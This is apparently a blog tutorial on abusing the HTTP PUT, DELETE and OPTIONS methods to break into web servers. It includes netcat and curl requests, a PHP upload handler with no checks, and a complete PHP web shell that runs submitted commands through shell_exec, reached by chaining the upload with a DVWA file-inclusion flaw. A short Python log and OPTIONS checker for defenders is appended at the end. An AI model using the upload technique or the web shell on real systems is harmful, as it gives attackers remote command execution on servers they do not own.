The HTTP protocol comprises the following verbs, or methods.
I assume you are already familiar with them; you can read about them in detail in this RFC document.
I will show some interesting HTTP verbs that can be used to break into servers. These attacks are rare in practice, but I thought they were worth sharing 🙂
If the OPTIONS verb is enabled on the server, it can be used to list all the HTTP methods the server has configured.
% nc localhost 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sun, 14 Jun 2015 05:31:10 GMT
Connection: close
The DELETE verb is dangerous and can be misused: if it is misconfigured, it can be used to delete resources from the web server.
% nc localhost 80
DELETE /location/resource HTTP/1.0

Date: Sun, 14 Jun 2015 05:01:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
The PUT verb can be used to upload a resource to the server. This is also a risky verb if it is not configured properly. For example, suppose we want to write "<?php echo 'Hello World'; ?>" to a new file named "hello.php". Make sure you give the correct length of your payload in the Content-Length header.
% cat -e hello.php
<?php echo 'Hello World'; ?>$
% wc -m hello.php
29 hello.php
% nc localhost 80
PUT /hello.php HTTP/1.0
Content-Type: text/html
Content-Length: 29

<?php echo 'Hello World'; ?>
PUT verb in PHP
PHP supports the PUT verb. This is a sample program that reads the body of a PUT request and saves it as "myfile".
<?php
// Copies the raw PUT request body into "myfile" next to this script: no authentication, no validation of the content
$putdata = fopen("php://input", "r");
$fp = fopen("myfile", "w");
while ($data = fread($putdata, 1024)) fwrite($fp, $data);
fclose($putdata); fclose($fp);
I will save this as "put.php" in the document root of the web server.
Now we can request "put.php" with the PUT verb and send our payload.
% cat -e phpinfo.php
<?php phpinfo(); ?>$
% wc -m phpinfo.php
20 phpinfo.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 20

<?php phpinfo(); ?>

HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 06:48:16 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
Now if you view "myfile", our payload should have been written to it.
Suppose you also have a local file inclusion vulnerability; in that case we can include the file we just wrote using PUT.
This is an example of local file inclusion. I'll be using DVWA to demonstrate it.
<?php
// The "page" parameter is taken straight from the request; DVWA later passes $file to include()
echo "File included: ".$_REQUEST["page"]."<br>";
$file = $_REQUEST["page"];
Suppose we want to upload a simple web shell; we can do it like the following 😉
% wc -m shell.php
189 shell.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 189

<?php
print '<form method="post">
Command: <input type="text" name="__"><br>
<input type="submit">
</form>';
if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>';
?>

HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 07:39:42 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
After that, include "myfile" through the file inclusion and you can execute commands on the server.
You can also use curl to upload a file with PUT easily.
% curl http://192.168.1.5/put.php --upload-file shell.php -v
* About to connect() to 192.168.1.5 port 80 (#0)
* Trying 192.168.1.5...
* connected
* Connected to 192.168.1.5 (192.168.1.5) port 80 (#0)
> PUT /put.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.1.5
> Accept: */*
> Content-Length: 189
> Expect: 100-continue
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 100 Continue
* additional stuff not fine transfer.c:1037: 0 0
* We are completely uploaded and fine
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Mon, 15 Jun 2015 07:47:44 GMT
< Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
< X-Powered-By: PHP/5.4.22
< Content-Length: 0
< Content-Type: text/html
<
* Connection #0 to host 192.168.1.5 left intact
* Closing connection #0
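A defender-side check for the two things shown above, the methods an OPTIONS reply advertises and the PUT/DELETE requests a server actually accepted, as an added Python example that is not part of the original post. The OPTIONS reply and the access-log lines it runs over are constructed samples, and the log format is assumed to be Apache's combined format.

```python
import re

# Methods this post shows being abused when a server leaves them enabled; TRACE
# is included because it appears in the Allow header above and is normally disabled.
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}

def risky_methods_from_options(raw_response):
    """Parse an OPTIONS reply (text as captured with nc) and return the risky
    methods it advertises in its Allow and Public headers."""
    advertised = set()
    for line in raw_response.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in ("allow", "public"):
            advertised |= {m.strip().upper() for m in value.split(",") if m.strip()}
    return advertised & RISKY_METHODS

# Apache "combined" access-log format; only the fields the check needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def scan_access_log(lines):
    """Return (ip, method, path, status) for every PUT/DELETE/TRACE request the
    server answered with 2xx, i.e. a risky method accepted instead of refused (405)."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        status = int(m["status"])
        if m["method"] in RISKY_METHODS and 200 <= status < 300:
            alerts.append((m["ip"], m["method"], m["path"], status))
    return alerts

# Constructed sample input (not captured from the post's servers): an OPTIONS reply
# with the same Allow header as above, and three access-log lines, one of which is
# an accepted PUT to put.php like the one shown in the post.
OPTIONS_REPLY = "HTTP/1.1 200 OK\r\nAllow: OPTIONS, TRACE, GET, HEAD, POST\r\nServer: x\r\n"
SAMPLE_LOG = [
    '192.168.1.9 - - [15/Jun/2015:06:48:16 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"',
    '192.168.1.9 - - [15/Jun/2015:06:48:20 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "-"',
    '192.168.1.9 - - [15/Jun/2015:06:48:25 +0000] "DELETE /a.txt HTTP/1.1" 405 0 "-" "-"',
]

if __name__ == "__main__":
    print(risky_methods_from_options(OPTIONS_REPLY))  # {'TRACE'}
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The 405 DELETE in the sample is deliberately not reported: a refused method is the configuration you want, only accepted ones need attention.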
Thanks for reading!